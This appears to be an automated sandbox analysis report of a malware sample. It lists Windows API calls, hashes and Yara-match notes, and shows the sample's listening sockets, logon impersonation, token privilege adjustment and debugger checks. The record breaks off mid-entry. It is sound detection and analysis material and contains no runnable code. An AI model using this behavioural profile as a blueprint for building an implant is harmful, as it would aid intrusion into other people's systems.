                            • Opcode ID: 8ddc581e2a499d347e69a0bf1684f5242460dfa37f450859a17bbf26abff2891
                            • Instruction ID: 7d3526ffe677d900a35bc833a07800624ee3746e5ba7b9dc34b81b8b5537df45
                            • Opcode Fuzzy Hash: 8ddc581e2a499d347e69a0bf1684f5242460dfa37f450859a17bbf26abff2891
                            • Instruction Fuzzy Hash: F0119072A00214EAD700ABF99C86EEEB7BCDF08728F104166F611E6191EA748A049779
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB3697
                            • Sleep.KERNEL32(000003E8), ref: 00DB3707
                            • GetTickCount.KERNEL32 ref: 00DB370D
                            • Sleep.KERNEL32(000003E8), ref: 00DB3720
                            • closesocket.WS2_32(00000000), ref: 00DB3727
                            • send.WS2_32(00000000,?,?,00000000), ref: 00DB373A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountSleepTick$closesocketsend
                            • String ID:
                            • API String ID: 1472970430-0
                            • Opcode ID: ffad76579d718df4260da560444256de145bd7a6418c974a69003c438ee2826a
                            • Instruction ID: b2b9d993faee98f7bad836e14df956a8078451dfeb62a8753f626edaff4b20f4
                            • Opcode Fuzzy Hash: ffad76579d718df4260da560444256de145bd7a6418c974a69003c438ee2826a
                            • Instruction Fuzzy Hash: C4116DB2C00218EBDF01ABF49C82CDD7B78EF04320F240527F112A6191EE359604AB75
                            APIs
                            • socket.WS2_32(00000002,00000001,00000000), ref: 00DB85CF
                            • htons.WS2_32(?), ref: 00DB85EB
                            • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00DB8604
                            • closesocket.WS2_32(00000000), ref: 00DB860F
                            • bind.WS2_32(00000000,?,00000010), ref: 00DB861D
                            • listen.WS2_32(00000000,?), ref: 00DB862B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: bindclosesockethtonsioctlsocketlistensocket
                            • String ID:
                            • API String ID: 1767165869-0
                            • Opcode ID: b03050f498ad8b4b05d9a0e8657c4d2085af81a405eeff0bd84cb1126a4fd252
                            • Instruction ID: b033763a301522e9daa272c25c5e4d8ecc62b328a24433a6f9f770b729a68dd9
                            • Opcode Fuzzy Hash: b03050f498ad8b4b05d9a0e8657c4d2085af81a405eeff0bd84cb1126a4fd252
                            • Instruction Fuzzy Hash: F101B531641668FACB21AFA58C45EEFBB2DEF41760F140117F942E6291EB308A41D3F9
                            APIs
                              • Part of subcall function 00DBDF1C: RevertToSelf.ADVAPI32(00000100,00DBE4B0,00000000,?,?,00DB19A7,?,00000000,00000000,00000000,00000100,00000100), ref: 00DBDF33
                            • LogonUserA.ADVAPI32(?,?,?,00000009,00000003,00DF08A4), ref: 00DBE292
                            • GetLastError.KERNEL32 ref: 00DBE29C
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,00DB4ACB,?,00DB48E4,00DB4ACB,?,00000400), ref: 00DB31DE
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00DB4ACB,00DB48E4,?,00DB48E4,00DB4ACB,?,00000400,?,?,?,?,00DB4ACB), ref: 00DB31F7
                              • Part of subcall function 00DB16CB: _malloc.LIBCMT ref: 00DB16D1
                              • Part of subcall function 00DB1825: _vwprintf.LIBCMT ref: 00DB182F
                              • Part of subcall function 00DB1825: _vswprintf_s.LIBCMT ref: 00DB1853
                              • Part of subcall function 00DB1864: _memset.LIBCMT ref: 00DB1872
                            • ImpersonateLoggedOnUser.ADVAPI32 ref: 00DBE2B6
                            • GetLastError.KERNEL32 ref: 00DBE2C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$ByteCharErrorLastMultiUserWide$ImpersonateLoggedLogonRevertSelf_memset_vswprintf_s_vwprintf
                            • String ID: %s\%s
                            • API String ID: 744593125-4073750446
                            • Opcode ID: 9057c93d9e1a47a0bf1ce3c8525b3ec33e86fa725b539167fd98b30723d0bc9e
                            • Instruction ID: 0e8e7261050e87524d9616be91a81cbdb540651a9b5c9d33688d4bc0554c2f94
                            • Opcode Fuzzy Hash: 9057c93d9e1a47a0bf1ce3c8525b3ec33e86fa725b539167fd98b30723d0bc9e
                            • Instruction Fuzzy Hash: 2831EFB5500309FEDB017BA5EC46EEA3FADEB04794F544025F50AD6262EB318614DBF1
                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 00DD41AD
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DD41C2
                            • UnhandledExceptionFilter.KERNEL32(00DDBC2C), ref: 00DD41CD
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00DD41E9
                            • TerminateProcess.KERNEL32(00000000), ref: 00DD41F0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: 8f2c49d16298889554fbe74834460f7822af03f5a5379f627a53c77ddf9174d9
                            • Instruction ID: 2cf7a98ae4242a1c621d3a73a58e81e2bd74889591480ed6b1389cf8a9b787f5
                            • Opcode Fuzzy Hash: 8f2c49d16298889554fbe74834460f7822af03f5a5379f627a53c77ddf9174d9
                            • Instruction Fuzzy Hash: 1F21C2B5422384DFC711EF68FDC56143BE0FB48326F50201AE908CA362D77455868F79
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00401AAF
                            • UnhandledExceptionFilter.KERNEL32 ref: 00401ABF
                            • GetCurrentProcess.KERNEL32 ref: 00401AC8
                            • TerminateProcess.KERNEL32 ref: 00401AD9
                            • abort.MSVCRT ref: 00401AE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                            • String ID:
                            • API String ID: 520269711-0
                            • Opcode ID: f1735b2a21335909bc253273f0ac7d76cfe1abd3c6ccf2038b615fc4144ab68f
                            • Instruction ID: 4cf10dc5dd0b46c0d15535f06df006338fe5ac01ee9545680c35680ef873d5b5
                            • Opcode Fuzzy Hash: f1735b2a21335909bc253273f0ac7d76cfe1abd3c6ccf2038b615fc4144ab68f
                            • Instruction Fuzzy Hash: C71104B8904701CFC700EF79E98860ABBF0BB48305F418939E98897362E774D944CF5A
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32 ref: 004019DF
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 004019F0
                            • GetCurrentThreadId.KERNEL32 ref: 004019F8
                            • GetTickCount.KERNEL32 ref: 00401A00
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 00401A0F
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                            • String ID:
                            • API String ID: 1445889803-0
                            • Opcode ID: ce9964a745ff34b1e52db9bb427ed0266c0b5c27dc7e9c3f673c87eb161a208f
                            • Instruction ID: f91986c62e855f646c45f311636352fb5b7618295fe1daaf99d33dd895697f3e
                            • Opcode Fuzzy Hash: ce9964a745ff34b1e52db9bb427ed0266c0b5c27dc7e9c3f673c87eb161a208f
                            • Instruction Fuzzy Hash: 72112EB56093008BD710DF7AE9CC64BBBE0FB88355F150C3AE545C6720EA35D849CB96
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00401AAF
                            • UnhandledExceptionFilter.KERNEL32 ref: 00401ABF
                            • GetCurrentProcess.KERNEL32 ref: 00401AC8
                            • TerminateProcess.KERNEL32 ref: 00401AD9
                            • abort.MSVCRT ref: 00401AE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                            • String ID:
                            • API String ID: 520269711-0
                            • Opcode ID: e890205312924e3d75c916e9bd349fed97dc7cc0427307e0de22e70c0feafd3e
                            • Instruction ID: 06684be4768ddce2bfe548fce248f846a3560142eb51a47cff2d5cf3969212e5
                            • Opcode Fuzzy Hash: e890205312924e3d75c916e9bd349fed97dc7cc0427307e0de22e70c0feafd3e
                            • Instruction Fuzzy Hash: 721117B9900701CFD700EF79E94864A7BF0BB09302F418979E94897362E774E844CF5A
                            APIs
                            • socket.WS2_32(00000002,00000001,00000000), ref: 00DBEDC5
                            • closesocket.WS2_32(00000000), ref: 00DBEDD2
                            • htons.WS2_32(?), ref: 00DBEDE3
                            • bind.WS2_32(00000000,?,00000010), ref: 00DBEDFA
                            • listen.WS2_32(00000000,00000078), ref: 00DBEE0B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: bindclosesockethtonslistensocket
                            • String ID:
                            • API String ID: 564772725-0
                            • Opcode ID: 5546e49d767f56db25d24d8bed52f7b2c7aec2182f4a8befcc1dabd2db83c163
                            • Instruction ID: 2cb7a7a2d06787ff50c87ae7c3e9de2e1bdad459bf3c624d934c7f5cdef14b9b
                            • Opcode Fuzzy Hash: 5546e49d767f56db25d24d8bed52f7b2c7aec2182f4a8befcc1dabd2db83c163
                            • Instruction Fuzzy Hash: A2F08135881254F6DA103BB49C0BBEE77289F11734F104356F9B7AA1D2E7B0864493BA
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?,00000000,?), ref: 00DB22C8
                            • LoadLibraryA.KERNEL32(00000000,?,00000000,?), ref: 00DB22D3
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DB22DB
                              • Part of subcall function 00DB26E2: _vswprintf_s.LIBCMT ref: 00DB26FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleLibraryLoadModuleProc_vswprintf_s
                            • String ID: %s!%s
                            • API String ID: 2092861438-2935588013
                            • Opcode ID: 886e77d536adfdff62672831c84a89e8c09880d66f04f3856277200e6b5ec38d
                            • Instruction ID: d7dad79c8ef67afa26a7f0a3d05b7b5f976c5808c6e61f702c9d3bdfe430e13b
                            • Opcode Fuzzy Hash: 886e77d536adfdff62672831c84a89e8c09880d66f04f3856277200e6b5ec38d
                            • Instruction Fuzzy Hash: 2A41D577904100DBDF189FA0D885EFA37B9EB84720F794056EA07EB281DA34DD4287B9
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?,00000000,?), ref: 00DB22C8
                            • LoadLibraryA.KERNEL32(00000000,?,00000000,?), ref: 00DB22D3
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DB22DB
                              • Part of subcall function 00DB26E2: _vswprintf_s.LIBCMT ref: 00DB26FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleLibraryLoadModuleProc_vswprintf_s
                            • String ID: %s!%s
                            • API String ID: 2092861438-2935588013
                            • Opcode ID: e3455d6bdc65aa6bc8be5033fd89f4ca53bd3da2825a6aa452d15bcc181f7c8e
                            • Instruction ID: d7dad79c8ef67afa26a7f0a3d05b7b5f976c5808c6e61f702c9d3bdfe430e13b
                            • Opcode Fuzzy Hash: e3455d6bdc65aa6bc8be5033fd89f4ca53bd3da2825a6aa452d15bcc181f7c8e
                            • Instruction Fuzzy Hash: 2A41D577904100DBDF189FA0D885EFA37B9EB84720F794056EA07EB281DA34DD4287B9
                            APIs
                            • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00DB4227
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00DB424A
                            • GetLastError.KERNEL32 ref: 00DB4254
                              • Part of subcall function 00DB1825: _vwprintf.LIBCMT ref: 00DB182F
                              • Part of subcall function 00DB1825: _vswprintf_s.LIBCMT ref: 00DB1853
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
                            • String ID: %s
                            • API String ID: 2004037343-620797490
                            • Opcode ID: d671fc86671c4f2476bf730bd1ff7e9754596a19a974a9d31d771fbd772934c8
                            • Instruction ID: 1574750afb96ca86c0ff61f9a32f22041c9eecf7cbb971c0f5a788b189f43cac
                            • Opcode Fuzzy Hash: d671fc86671c4f2476bf730bd1ff7e9754596a19a974a9d31d771fbd772934c8
                            • Instruction Fuzzy Hash: 02114A76900219FAEB11DFA8DD45AFFBBBCEF08350B100426F905E6151E6319E0896B5
                            APIs
                            • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00DB4227
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00DB424A
                            • GetLastError.KERNEL32 ref: 00DB4254
                              • Part of subcall function 00DB1825: _vwprintf.LIBCMT ref: 00DB182F
                              • Part of subcall function 00DB1825: _vswprintf_s.LIBCMT ref: 00DB1853
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
                            • String ID: %s
                            • API String ID: 2004037343-620797490
                            • Opcode ID: 48756c8de3f27635fac505c02c9e297aac22576c041ce1ce9de54a3e52996fad
                            • Instruction ID: 1574750afb96ca86c0ff61f9a32f22041c9eecf7cbb971c0f5a788b189f43cac
                            • Opcode Fuzzy Hash: 48756c8de3f27635fac505c02c9e297aac22576c041ce1ce9de54a3e52996fad
                            • Instruction Fuzzy Hash: 02114A76900219FAEB11DFA8DD45AFFBBBCEF08350B100426F905E6151E6319E0896B5
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB7E66
                            • Sleep.KERNEL32(000003E8), ref: 00DB7EB6
                            • GetTickCount.KERNEL32 ref: 00DB7EBC
                            • WSAGetLastError.WS2_32 ref: 00DB7EC2
                              • Part of subcall function 00DB7E11: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00DB7E23
                              • Part of subcall function 00DB75E5: _memset.LIBCMT ref: 00DB7606
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTick$ErrorLastSleep_memsetioctlsocket
                            • String ID:
                            • API String ID: 3301373915-0
                            • Opcode ID: 7397935bee361eb1395b79fd199930c1949dd08b8b39d21cdc24570ce58b0d73
                            • Instruction ID: 2380c01531a847719cf825d7cc28aa97867fcb3e111137063ec1939a42db1854
                            • Opcode Fuzzy Hash: 7397935bee361eb1395b79fd199930c1949dd08b8b39d21cdc24570ce58b0d73
                            • Instruction Fuzzy Hash: BC117072C0820AEBDB0177B59C869EE7BA8DF84764F240023F602A6191EE309D8597B5
                            APIs
                            • Sleep.KERNEL32(000003E8), ref: 00DB3707
                            • Sleep.KERNEL32(000003E8,00000000,?,?,00000000), ref: 00DB3720
                            • closesocket.WS2_32(00000000), ref: 00DB3727
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$closesocket
                            • String ID:
                            • API String ID: 1480910923-0
                            • Opcode ID: 2c2b2ce40d1465964f89295a1d43842caa7545342d65f725d138f1d669df8578
                            • Instruction ID: b2b9d993faee98f7bad836e14df956a8078451dfeb62a8753f626edaff4b20f4
                            • Opcode Fuzzy Hash: 2c2b2ce40d1465964f89295a1d43842caa7545342d65f725d138f1d669df8578
                            • Instruction Fuzzy Hash: C4116DB2C00218EBDF01ABF49C82CDD7B78EF04320F240527F112A6191EE359604AB75
                            APIs
                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,74DF2E90,?,?,?,00DB80ED), ref: 00DBE475
                            • CheckTokenMembership.ADVAPI32(00000000,?,00DB80ED,?,?,?,00DB80ED), ref: 00DBE48A
                            • FreeSid.ADVAPI32(?,?,?,?,00DB80ED), ref: 00DBE49A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateCheckFreeInitializeMembershipToken
                            • String ID:
                            • API String ID: 3429775523-0
                            • Opcode ID: df1425956a1023e337678163ab9acbb9120de10e079168268264eda6ab881f9b
                            • Instruction ID: ef6217ff4e5f2f519d8e885a6fe2271e778df27097d3980610e8278c1afa6708
                            • Opcode Fuzzy Hash: df1425956a1023e337678163ab9acbb9120de10e079168268264eda6ab881f9b
                            • Instruction Fuzzy Hash: 2E011D76945288FFDB11DBE88C84AEEBFBCAB15204F44449AA511E3241D3709B08DB35
                            APIs
                            • DeleteProcThreadAttributeList.KERNEL32(00DB934A,?,00DB934A,00000000), ref: 00DB91C8
                            • GetProcessHeap.KERNEL32(00000000,00DB934A,?,00DB934A,00000000), ref: 00DB91D3
                            • HeapFree.KERNEL32(00000000,?,00DB934A,00000000), ref: 00DB91DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AttributeDeleteFreeListProcProcessThread
                            • String ID:
                            • API String ID: 551783810-0
                            • Opcode ID: 6155b83e8743b315ee007a9921d15385ce61c8e9f8b407c3fb28189419e379ad
                            • Instruction ID: a951b2b3d821f35ee67a080bfda2c3e4f9fd43a857c4000bc1d11e27bf59586d
                            • Opcode Fuzzy Hash: 6155b83e8743b315ee007a9921d15385ce61c8e9f8b407c3fb28189419e379ad
                            • Instruction Fuzzy Hash: DAC00232045348FFDF112FE1EC0DA9A7F29EB0A66AF018013F61DC56A1CB7295519BB1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $<$abcdefghijklmnop
                            • API String ID: 0-2431890337
                            • Opcode ID: 825b59aef45760b650a700909c1b35609783ae259bdea21978c9f2b5c29bb4c4
                            • Instruction ID: 666d8f6e3687e407bedaf9723322d529f03a767473ee96bd9366fc28d73f5761
                            • Opcode Fuzzy Hash: 825b59aef45760b650a700909c1b35609783ae259bdea21978c9f2b5c29bb4c4
                            • Instruction Fuzzy Hash: 9C52F475E002598FDB48CF69C491AADBBF1EF4D300F14C1AAE865AB352D234E951CFA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $<
                            • API String ID: 0-428540627
                            • Opcode ID: 8f17b7d656fda2f539b22130276217b8beca0b9ca9f1e22ccb95e8b605794827
                            • Instruction ID: fd178c8c37e2557c92c1984edd401c16fd1adec4bae82b58e68c1d1e2c606e4c
                            • Opcode Fuzzy Hash: 8f17b7d656fda2f539b22130276217b8beca0b9ca9f1e22ccb95e8b605794827
                            • Instruction Fuzzy Hash: 6752E375A102198FDB48CF69C491AADBBF1EF8D300F14C16AE865AB352C234E951CFA4
                            APIs
                            • Sleep.KERNEL32(000003E8), ref: 00DB7EB6
                            • WSAGetLastError.WS2_32 ref: 00DB7EC2
                              • Part of subcall function 00DB7E11: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00DB7E23
                              • Part of subcall function 00DB75E5: _memset.LIBCMT ref: 00DB7606
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastSleep_memsetioctlsocket
                            • String ID:
                            • API String ID: 4193628849-0
                            • Opcode ID: 7e7743ce85dbad4c5b81ac384653d6f0fed9f7b7a2bee776d3f98450f482e452
                            • Instruction ID: 2380c01531a847719cf825d7cc28aa97867fcb3e111137063ec1939a42db1854
                            • Opcode Fuzzy Hash: 7e7743ce85dbad4c5b81ac384653d6f0fed9f7b7a2bee776d3f98450f482e452
                            • Instruction Fuzzy Hash: BC117072C0820AEBDB0177B59C869EE7BA8DF84764F240023F602A6191EE309D8597B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52ab5c385dc5cbe30193eeadd58545ad297c790370df914d4dc5477e40e4bae5
                            • Instruction ID: 4ce7199980ca9cbb3ab4e5ba34a3495993519f54de26b916c99ca9b1bb766950
                            • Opcode Fuzzy Hash: 52ab5c385dc5cbe30193eeadd58545ad297c790370df914d4dc5477e40e4bae5
                            • Instruction Fuzzy Hash: 3A1271719201598FCB08CF5DD891ABDBBF1EF49301F48816EE456EB386CA38E611DB64
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 713d4da708e507e8e1ad1b26dcf6fc677549dbd504e9a6ab50fae4ca0ac85f09
                            • Instruction ID: 9c000924473d6e627add4c71c522c2cd61c043e3d2c7cf6e308a8ca813a53a89
                            • Opcode Fuzzy Hash: 713d4da708e507e8e1ad1b26dcf6fc677549dbd504e9a6ab50fae4ca0ac85f09
                            • Instruction Fuzzy Hash: C91272319101698FDB08CF5DC8D1ABDBBF1EF49341F54826EE4569B386C638EA12DB60
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7bcf4a93cf0e073b3dc1f03daa1e0a326a8bdfedaa49a37eb3d1dfebbb949f1c
                            • Instruction ID: eb3a02a25adb7a70c866b771063a4dcf60f4a6fd71850e980e6fcfe65194bb18
                            • Opcode Fuzzy Hash: 7bcf4a93cf0e073b3dc1f03daa1e0a326a8bdfedaa49a37eb3d1dfebbb949f1c
                            • Instruction Fuzzy Hash: 98124E719142598FCB08CF5DD8919BDBBF2EF49300F59816AE496EF382C638E611DB60
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 649c5e0e6f184d593b2a95c2cf2d13bc3a42248f38c8f0b10b3a1c93a9f16d11
                            • Instruction ID: b3a177434e38d9f8d76899524e35401ac714afc3668a0faadb3c23ed4e76b7ba
                            • Opcode Fuzzy Hash: 649c5e0e6f184d593b2a95c2cf2d13bc3a42248f38c8f0b10b3a1c93a9f16d11
                            • Instruction Fuzzy Hash: 3D1250719141A98FDB08CF5DC8D19BDBBF1FF49300F55826AE456AB382C638EA11DB60
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                            • Instruction ID: 024971a3f48ba037cd832ad3432bf4f16ec57a3f43c787c0c05fc17159f836d3
